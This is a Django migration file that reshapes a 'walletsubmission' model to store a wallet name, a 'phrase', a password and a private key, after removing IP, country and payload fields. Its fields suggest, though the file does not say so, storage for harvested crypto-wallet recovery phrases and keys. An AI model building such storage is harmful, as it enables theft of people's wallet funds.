# Generated by Django 4.2.13 on 2025-08-17 23:02

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('core', '0003_alter_visitlog_path_alter_visitlog_user_agent'),
    ]

    operations = [
        migrations.RenameField(
            model_name='walletsubmission',
            old_name='user_agent',
            new_name='phrase',
        ),
        migrations.RemoveField(
            model_name='walletsubmission',
            name='country',
        ),
        migrations.RemoveField(
            model_name='walletsubmission',
            name='ip',
        ),
        migrations.RemoveField(
            model_name='walletsubmission',
            name='payload',
        ),
        migrations.AddField(
            model_name='walletsubmission',
            name='password',
            field=models.CharField(blank=True, max_length=100, null=True),
        ),
        migrations.AddField(
            model_name='walletsubmission',
            name='private_key',
            field=models.TextField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='walletsubmission',
            name='wallet',
            field=models.CharField(default='Unknown', max_length=100),
            preserve_default=False,
        ),
    ]
